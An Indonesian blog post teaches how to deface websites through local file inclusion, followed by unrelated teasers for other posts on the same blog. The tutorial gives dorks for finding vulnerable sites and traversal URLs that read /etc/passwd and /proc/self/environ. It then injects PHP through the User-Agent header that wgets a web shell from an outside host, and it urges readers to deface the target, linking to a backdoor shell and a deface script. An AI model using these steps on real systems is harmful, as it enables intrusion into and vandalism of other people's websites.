Langsung ke konten utama

Tutorial deface menggunakan poc LFI

 



Hallo :)

Pada peluang kali ini saya bakal coba mengimplementasikan bagaimana caranya mengexploitasi terhadap website tujuan yang rentan terhadap serangan LFI atau mampu disebut termasuk bersama Local File Inclusion.


Oke tak usah berlalu-lama, kami langsung saja ya...


Hal yang pertama adalah mencari tujuan yang vulnerable terhadap serangan LFI. Kalian mampu memanfatkan search engine layaknya google, bing, atau yang lainya bersama dork, perumpamaan dorknya "index.php?file= site:com" selebihnya kembangin sendiri biar meraih yang terlalu vuln.


Tapi di sini saya sudah memiliki tujuan yang siap untuk dieksekusi, tapi saya tidak bakal saya sebutkan nama websitenya,  perumpamaan tujuan saya layaknya ini...


Jika kalian belum punya Shell backdoor dan script deface kalian bisa download dulu melalui link dibawah ini :


Shell backdoor : Klik Me 

Script deface : Klik Me


 

https://contoh.com/?file=college.php


Target sudah ada, kemudian coba ubah "college.php" bersama "../../../" perumpamaan lengkapnya bakal layaknya ini..

https://contoh.com/?file=../../../

Setelah saya klik enter, tapi di sini saya tidak meraih pesan error dengan sebutan lain hanya blank warna putih gitu. Entah ini vuln atau tidak saya termasuk agak begitu kurang paham.


Ok gamasalah, coba iseng-iseng menganti "../../../" bersama layaknya ini "/etc/passwd" perumpamaan layaknya ini...

https://contoh.com/?file=/etc/passwd

Tapi lagi-lagi di sini tidak meraih apa-apa, penampilan hanya menampkan blank warna putih, shit!



 

Mikir sebentar, kemudian di sini saya coba menaikan directorynya. Contoh layaknya ini..

https://contoh.com/?file=../etc/passwd > blank

https://contoh.com/?file=../../etc/passwd > lagi-lagi hanya blank

Tapi kemudian terhadap pas saya menaikan directorynya pas ke tiga, sepetti ini...

https://contoh.com/?file=../../../etc/passwd

Boom, saya berhasil membaca file etc/passwd wah mantap ini mah hhh...




Selanjutnya saya bakal coba mengecheck /proc/self/environ apakah mampu diakses atau tidak? Sekarang ubah "/etc/passwd" bersama "/proc/self/environ" selanjutnya jalankan..

https://contoh.com/?file=../../../proc/self/environ

Mantul mantap betul ternyata berhasil membaca filenya, layaknya ini...




Yeah, /proc/self/environ berhasil diakses. Tapi terkecuali kalian terhadap pas mau mengakses /proc/self/environ menampilkan halaman kosong (blank) atau tidak mampu diakses, atau barangkali itu beroperating system *BSD.


Sekarang seterusnya mari kami injeksi bersama malicious code bersama meracuni  terhadap bagian http headernya. Kalian mampu mengunakan addon tamper information mozilla firefox.

Caranya membuka tamper information di mozilla firefox kemudian selanjutnya masukan url /proc/self/environ yang tadi "https://contoh.com/?file=../../../proc/self/environ" selanjutnya terhadap bagian user-agent isikian code layaknya tersebut ini...


<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>


lalu klik submit.


Ok injeksi malicious code selesai, bila berhasil letak shellnya berada terhadap directory berikut...


https://contoh.com/shell.php 



Setelah Shell berhasil di akses terserah kalian mau diapain, saran mending deface saja jangan aneh-aneh kasian yang punya website:v kalau mau tebas index backup dulu ya, atau ganti saja file index.php saja.

Label:

Komentar

Posting Komentar

Berkomentar dengan baik dan dilarang mencantumkan link aktif, jika ada komentar dengan link aktif akan admin nonaktifkan.

Postingan populer dari blog ini

Cara mengatasi Konami ID has been locked saat login Konami ID

  Halo sobat tamatekno , di artikel kali ini admin mau share tips atau tutorial mengatasi Konami ID has been locked. Konami ID has been locked biasa terjadi saat anda hendak login ke PES mobile menggunakan data transfer Konami ID, yang artinya akun Konami ID anda terkunci atau dikunci oleh Konami karena aktifitas yang mencurigakan. Ada beberapa hal yang menyebabkan akun Konami ID anda terkunci, dan berikut adalah beberapa hal yang menyebabkan akun Konami ID anda terkunci. Penyebab akun Konami ID has been locked Mungkin anda sudah tahu apa penyebabnya, namun jika anda belum tahu maka anda harus mengetahuinya terlebih dahulu. Anda dapat memahami beberapa hal yang menyebabkan akun Konami ID anda terkunci. - Terlalu sering memasukan password yang salah - Login di perangkat lain yang berbeda OS (misalnya android dan IOS) - Terlalu sering gagal login menggunakan Konami ID - Terlalu sering gonta-ganti akun menggunakan data transfer Konami ID - Akun terindikasi berbahaya oleh pihak Konam...
Posting Komentar
Baca selengkapnya

Free Download Novel Agatha Christie Bahasa Indonesia PDF

Tamatekno - Download Novel Agatha Christie Bahasa Indonesia, Di postingan kali ini admin mau update Novel terbaru nih, yaitu novel-novel dari Agatha Christie. Temen-temen bisa download satu-persatu atau download semuanya dalam bentuk zip nanti.   Dame Agatha Mary Clarissa Christie merupakan seorang penulis kisah misteri yang lahir di Torquay, Devon, Inggris pada tanggal 15 september 1890. Pria yang kerap dikenal sebagai Agatha Christie memang memiliki banyak karya yang tentunya sangat laku, bahkan saat ini masih menyandang gelar penulis kisah misteri yang karyanya paling laku.   Agatha Christie memiliki lebih dari 80 novel yant telah ia terbitkan, selain novel ia juga menerbitkan beberapa sandiwara teater yang kebanyakan kisah detektif. Agatha memang penulis yang sangat terkenal, bahkan buku-bukunya pun telah terjual lebih dari 1 miliar esklempar dalam bahasa inggris dan satu miliar lagi dalam bahasa asing seperti bahasa indonesia, spanyol, jerman, dan lain sebagainya.  ...
Posting Komentar
Baca selengkapnya

3 cara Flash Xiaomi Redmi 4x

 Melakukan Flash merupakan cara yang terbaik saat ponsel redmi 4x anda mengalami masalah atau kerusakan, dengan metode flashing anda dapat memperbaiki masalah seperti bootloop, terkena virus atau malware, bahkan mati total. Dengan melakukan flash maka semua data-data seperti file, aplikasi, gambar dll yang berada pada ponsel anda akan hilang, jadi sebelum melakukan flash sebaiknya anda backup terlebih dahulu data-data yang berada pada ponsel redmi 4x anda. Jika tidak mempermasalahkan data-data pada ponsel anda atau sudah terlanjur rusak sebelum anda memback-up nya , maka anda tidak perlu membackup namun semua data akan hilang. Ada beberapa cara untuk melakukan flash redmi 4x yang bisa anda gunakan, meskipun tujuannya sama tetapi tidak semuanya bisa anda terapkan, dan berikut adalah beberapa cara untuk flash redmi 4x. 3 Cara flash redmi 4x Sebelum melakukan proses flashing anda perlu menyiapkan beberapa bahan-bahan yang diperlukan, berikut adalah bahan-bahan yang perlu anda siapka...
Posting Komentar
Baca selengkapnya